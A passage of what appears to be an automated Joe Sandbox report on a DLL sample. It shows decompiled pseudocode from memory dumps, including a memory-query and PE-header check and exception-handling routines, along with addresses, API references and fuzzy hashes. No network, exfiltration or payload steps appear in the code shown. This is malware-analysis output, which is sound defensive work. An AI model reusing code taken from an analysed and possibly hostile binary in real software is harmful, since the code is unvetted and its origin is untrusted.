                                                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                    							_t81 =  *0x2f9d2e0; // 0x0
                                                                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                                                                    								if(_t61 < 0) {
                                                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t62 = _a4;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                    									L59:
                                                                                                                                                                                                                                    									_t63 = _t104;
                                                                                                                                                                                                                                    									goto L60;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                    									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                    									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                    										L46:
                                                                                                                                                                                                                                    										_t63 = 1;
                                                                                                                                                                                                                                    										 *0x2f9d328 = 1;
                                                                                                                                                                                                                                    										__eflags =  *0x2f9d328;
                                                                                                                                                                                                                                    										if( *0x2f9d328 != 0) {
                                                                                                                                                                                                                                    											goto L60;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t84 =  *0x2f9d2e0; // 0x0
                                                                                                                                                                                                                                    										__eflags = _t84;
                                                                                                                                                                                                                                    										_t93 = _t84;
                                                                                                                                                                                                                                    										if(_t84 <= 0) {
                                                                                                                                                                                                                                    											L51:
                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                    											if(_t93 != 0) {
                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                    												 *0x2f9d328 = 0;
                                                                                                                                                                                                                                    												goto L5;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t77 = 0xf;
                                                                                                                                                                                                                                    											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                    											if(_t84 <= _t77) {
                                                                                                                                                                                                                                    												_t77 = _t84;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t94 = 0;
                                                                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                                                                    												L56:
                                                                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                                                                    													 *0x2f9d2e0 = _t86;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                                    													_t68 = 0x2f9d2e8 + _t94 * 4;
                                                                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t69 = 0x2f9d2e4 + _t84 * 4;
                                                                                                                                                                                                                                    										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x2f9d328 = 1;
							__eflags =  *0x2f9d328;
							if( *0x2f9d328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x2f9d328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x2f9d2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x2f9d2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b51b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b511
                                                                                                                                                                                                                                    0x02f9b494
                                                                                                                                                                                                                                    0x02f9b497
                                                                                                                                                                                                                                    0x02f9b49c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4a5
                                                                                                                                                                                                                                    0x02f9b4a7
                                                                                                                                                                                                                                    0x02f9b4ad
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4b3
                                                                                                                                                                                                                                    0x02f9b4b9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4bf
                                                                                                                                                                                                                                    0x02f9b4c1
                                                                                                                                                                                                                                    0x02f9b4ca
                                                                                                                                                                                                                                    0x02f9b4ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4d4
                                                                                                                                                                                                                                    0x02f9b4d7
                                                                                                                                                                                                                                    0x02f9b4d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4e0
                                                                                                                                                                                                                                    0x02f9b4e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4e4
                                                                                                                                                                                                                                    0x02f9b4e8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4e8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3d3
                                                                                                                                                                                                                                    0x02f9b3d3
                                                                                                                                                                                                                                    0x02f9b3d3
                                                                                                                                                                                                                                    0x02f9b3da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3dc
                                                                                                                                                                                                                                    0x02f9b3dd
                                                                                                                                                                                                                                    0x02f9b3df
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3df
                                                                                                                                                                                                                                    0x02f9b407
                                                                                                                                                                                                                                    0x02f9b409
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b419
                                                                                                                                                                                                                                    0x02f9b41b
                                                                                                                                                                                                                                    0x02f9b41d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b423
                                                                                                                                                                                                                                    0x02f9b42a
                                                                                                                                                                                                                                    0x02f9b456
                                                                                                                                                                                                                                    0x02f9b456
                                                                                                                                                                                                                                    0x02f9b458
                                                                                                                                                                                                                                    0x02f9b45a
                                                                                                                                                                                                                                    0x02f9b46e
                                                                                                                                                                                                                                    0x02f9b470
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b465
                                                                                                                                                                                                                                    0x02f9b466
                                                                                                                                                                                                                                    0x02f9b468
                                                                                                                                                                                                                                    0x02f9b46a
                                                                                                                                                                                                                                    0x02f9b46a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b42c
                                                                                                                                                                                                                                    0x02f9b42c
                                                                                                                                                                                                                                    0x02f9b42f
                                                                                                                                                                                                                                    0x02f9b431
                                                                                                                                                                                                                                    0x02f9b443
                                                                                                                                                                                                                                    0x02f9b443
                                                                                                                                                                                                                                    0x02f9b446
                                                                                                                                                                                                                                    0x02f9b448
                                                                                                                                                                                                                                    0x02f9b448
                                                                                                                                                                                                                                    0x02f9b449
                                                                                                                                                                                                                                    0x02f9b449
                                                                                                                                                                                                                                    0x02f9b44f
                                                                                                                                                                                                                                    0x02f9b44f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b433
                                                                                                                                                                                                                                    0x02f9b433
                                                                                                                                                                                                                                    0x02f9b433
                                                                                                                                                                                                                                    0x02f9b43a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b43c
                                                                                                                                                                                                                                    0x02f9b43c
                                                                                                                                                                                                                                    0x02f9b43d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02F9B3F2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c
                                                                                                                                                                                                                                    • API String ID: 0-3674199949
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c
                                                                                                                                                                                                                                    • API String ID: 0-3674199949
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c
                                                                                                                                                                                                                                    • API String ID: 0-3674199949
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                    			E00402154(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                                                    				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E004022BB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00402375(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00402260(_t55, _t66);
										_t89 = _t66 + 0x10;
										E004022BB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00402357(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

Memory Dump Source
• Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
Similarity
• Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
• Instruction ID: 991b6e347445fc6bdfd9f5c6b66579e94d9d23a965324a07e0cc5b9e4db4a249
• Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
• Instruction Fuzzy Hash: 1421C7329002049BCB14DFA9C9C8967B7A5BF49310B4680ADDD19AB2C5D774FA15CBE0

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                    			E02F9B11C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                                                                    					E02F9B287(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                    					_t49 = E02F9B341(_t66);
                                                                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                    										E02F9B22C(_t55, _t66);
                                                                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                    										E02F9B287(_t89, _t66, 0);
                                                                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                    										E02F9B323(_t82[2]);
                                                                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                                                                    										 *(_t82[2])(1);
                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                    0x02f9b185
                                                                                                                                                                                                                                    0x02f9b186
                                                                                                                                                                                                                                    0x02f9b187
                                                                                                                                                                                                                                    0x02f9b18a
                                                                                                                                                                                                                                    0x02f9b18a
                                                                                                                                                                                                                                    0x02f9b18c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b18e
                                                                                                                                                                                                                                    0x02f9b18e
                                                                                                                                                                                                                                    0x02f9b1d8
                                                                                                                                                                                                                                    0x02f9b190
                                                                                                                                                                                                                                    0x02f9b190
                                                                                                                                                                                                                                    0x02f9b194
                                                                                                                                                                                                                                    0x02f9b19c
                                                                                                                                                                                                                                    0x02f9b1a1
                                                                                                                                                                                                                                    0x02f9b1a6
                                                                                                                                                                                                                                    0x02f9b1b2
                                                                                                                                                                                                                                    0x02f9b1ba
                                                                                                                                                                                                                                    0x02f9b1c1
                                                                                                                                                                                                                                    0x02f9b1c7
                                                                                                                                                                                                                                    0x02f9b1cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b1cb
                                                                                                                                                                                                                                    0x02f9b18e
                                                                                                                                                                                                                                    0x02f9b18c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b172
                                                                                                                                                                                                                                    0x02f9b1e6
                                                                                                                                                                                                                                    0x02f9b1e6
                                                                                                                                                                                                                                    0x02f9b1e6
                                                                                                                                                                                                                                    0x02f9b162
                                                                                                                                                                                                                                    0x02f9b202
                                                                                                                                                                                                                                    0x02f9b209

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                    • Instruction ID: 44e34a1159d628295a6f26bebca98574543b3051ba11cd12e0899e5b9d6c7269
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21A1329002049FEB14EF68DC809ABBBA5FF443A4B4581A8DA559B245E730FA55CBE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                                                                                                                                                                                                    • Instruction ID: 059581c573e862f4b8ee63126a68fb17cb25446cf25fa26084240c671de4b550
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0B6B1901119AEEF15CA54CC48FAAB7BDEBC8700F1081D5E60CAA150D2309E808F60
